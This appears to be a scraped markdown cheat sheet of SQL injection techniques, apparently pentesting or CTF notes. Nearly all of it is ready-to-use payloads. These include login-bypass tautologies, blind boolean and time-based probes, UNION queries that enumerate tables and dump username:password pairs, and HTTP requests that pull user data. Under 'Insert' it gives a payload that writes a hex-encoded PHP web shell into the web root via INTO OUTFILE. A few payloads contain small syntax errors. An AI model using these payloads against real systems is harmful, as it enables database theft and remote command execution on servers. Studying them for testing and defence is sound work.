147 lines
4.9 KiB
Markdown
147 lines
4.9 KiB
Markdown
# SQL Injection
|
|
|
|
* [MySQL Comments](https://blog.raw.pm/en/sql-injection-mysql-comment/)
|
|
|
|
## Finding an Opportunity
|
|
* GET parameter
|
|
```sh
|
|
http://example.com/index.php?id=' or 1=1 -- -
|
|
```
|
|
* Sometimes an ID or may come first
|
|
```sh
|
|
http://example.com/index.php?id=10 or 1=1 -- +
|
|
http://example.com/index.php?id=10' or '1'='1'-- -
|
|
http://example.com/index.php?id=-1' or 1=1 -- -&password=x
|
|
```
|
|
* Provoke error to gain information
|
|
```sh
|
|
http://example.com/index.php?id='
|
|
```
|
|
* **Incase of client side sanitization craft the URL instead of using the form!!!**
|
|
|
|
## Usage
|
|
* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
|
|
```sql
|
|
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
|
|
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
|
|
```
|
|
|
|
### Boolean True and False
|
|
```sql
|
|
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
|
|
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
|
|
```
|
|
* Blind boolean base substring fuzzing, one char at a time, by inspecting the return value after each inserted char.
|
|
```sql
|
|
' UNION SELECT null,null,null where database() like 'da%';-- -
|
|
```
|
|
|
|
### Time based
|
|
* Checking input blindly via sleep() function. Count number of cols in this way. If it is successful, the sleep(5) function executes
|
|
```sql
|
|
' union select sleep(3), null; -- -
|
|
```
|
|
|
|
### Blind injection // Guessing characters
|
|
```sh
|
|
http://example.com/?id=1' and substr((select database()),1,1) < 105 --+
|
|
```
|
|
```sh
|
|
http://example.com/?id=1' and (ascii(substr((select database(),1,1)) = 115 --+
|
|
```
|
|
* Function substr(string, start, length)
|
|
* sqlmap via `--level=5 --risk=3 --dbms=sqlite --technique=b --dump`
|
|
|
|
### Union based
|
|
* _First method__ check by order until error occurs
|
|
```sql
|
|
' order by 1 -- -
|
|
' order by 2 -- -
|
|
' order by 3 -- -
|
|
```
|
|
* __Second method__ fuzzing NULL values, followed by fuzzing data types
|
|
* Check number of cols
|
|
```sql
|
|
' UNION SELECT NULL--
|
|
' UNION SELECT NULL,NULL--
|
|
' UNION SELECT NULL,NULL,NULL--
|
|
# until the error occurs
|
|
```
|
|
* Check which one is a string
|
|
```sql
|
|
' UNION SELECT 'a',NULL,NULL,NULL--
|
|
' UNION SELECT NULL,'a',NULL,NULL--
|
|
' UNION SELECT NULL,NULL,'a',NULL--
|
|
' UNION SELECT NULL,NULL,NULL,'a'--
|
|
```
|
|
* Retrieve content, for cols and comment two times as an example. Or dump database
|
|
```sql
|
|
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
|
|
' UNION SELECT NULL,username,password,NULL FROM users -- //
|
|
```
|
|
|
|
* Retrieve content by union poking the count and order, afterwards extracting tables via
|
|
```sh
|
|
0 union select null, null, database()
|
|
0 union select null, null, group_concat(table_name) from information_schema.tables where table_schema = 'found_db'
|
|
0 union select null, null, group_concat(column_name) from information_schema.columns where table_name = 'found_tablename'
|
|
0 union select null, null, group_concat(username, ':', password from found_tablename
|
|
```
|
|
|
|
* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
|
|
|
|
### Identify Database
|
|
```sh
|
|
id=sqlite_version()
|
|
id=@@version # mysql/mssql
|
|
id=(SELECT banner FROM v$version) # oracle
|
|
```
|
|
|
|
#### SQL Functions
|
|
* Use sql functions to fumble the tables & cols via union
|
|
* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
|
|
* Extract tables
|
|
```sql
|
|
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
|
|
```
|
|
* sqlite specific
|
|
```sql
|
|
' UNION SELECT sql, sql FROM sqlite_master -- -
|
|
```
|
|
```sql
|
|
(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable')
|
|
(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%')
|
|
```
|
|
* Extract cols
|
|
```sh
|
|
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
|
|
```
|
|
* Data from cols
|
|
```sql
|
|
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
|
|
```
|
|
|
|
## Insert
|
|
* Insert file through insertion of `system()` or `exec_shell()` and a get parameter
|
|
```sql
|
|
<cookieID>'into outfile '/var/www/html/shello.php' lines terminated by 0x3c3f706870206563686f20223c7072653e22202e2073797374656d28245f4745545b22636d64225d29202e20223c2f7072653e223b3f3e -- -
|
|
```
|
|
|
|
### Examples
|
|
* sqli inside HTTP request to an API. Five values inside select have been discovered before
|
|
```HTTP
|
|
GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
|
|
```
|
|
* Get col names
|
|
```HTTP
|
|
GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
|
|
```
|
|
* Get notes from users by id
|
|
```HTTP
|
|
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
|
|
```
|
|
|
|
## Payloads
|
|
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
|
|
|